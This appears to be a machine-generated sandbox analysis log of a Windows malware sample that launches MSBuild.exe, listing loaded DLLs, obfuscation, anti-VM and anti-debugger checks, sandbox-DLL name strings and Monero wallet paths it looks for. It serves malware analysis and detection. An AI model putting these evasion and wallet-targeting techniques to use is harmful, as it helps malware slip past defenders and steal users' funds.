Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: lCVFGKfczi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: lCVFGKfczi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lCVFGKfczi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lCVFGKfczi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lCVFGKfczi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lCVFGKfczi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lCVFGKfczi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042594E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_0042594E
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC71AD push ecx; ret 0_2_00DC71C0
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1C13A push ecx; ret 0_2_00E1C14D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1C2D8 push ds; retn 0003h 0_2_00E1C38D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1C39E push ds; retn 0003h 0_2_00E1C38D
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1C454 push ds; retf 0003h 0_2_00E1C455
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E1E9ED push 0000004Ch; iretd 0_2_00E1E9FE
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E0ADAD push ecx; ret 0_2_00E0ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042F262 push ecx; ret 3_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00422E59 push esi; ret 3_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041DED5 push ecx; ret 3_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dedad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lCVFGKfczi.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lCVFGKfczi.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7436, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: lCVFGKfczi.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: lCVFGKfczi.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: lCVFGKfczi.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 3_2_0040180D
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\lCVFGKfczi.exe API coverage: 4.0 %
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DD9ABF FindFirstFileExW, 0_2_00DD9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA, 3_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410FBA GetSystemInfo, 3_2_00410FBA
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 00000003.00000002.1981603687.00000000011C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWW
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.1981603687.0000000001168000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DC7922
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0042594E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_0042594E
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DC2003 mov edi, dword ptr fs:[00000030h] 0_2_00DC2003
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DEE385 mov eax, dword ptr fs:[00000030h] 0_2_00DEE385
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DEE37A mov eax, dword ptr fs:[00000030h] 0_2_00DEE37A
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DEE362 mov eax, dword ptr fs:[00000030h] 0_2_00DEE362
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00E05582 mov eax, dword ptr fs:[00000030h] 0_2_00E05582
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DDA64C mov eax, dword ptr fs:[00000030h] 0_2_00DDA64C
Source: C:\Users\user\Desktop\lCVFGKfczi.exe Code function: 0_2_00DD0F2E mov ecx, dword ptr fs:[00000030h] 0_2_00DD0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h] 3_2_004014AD
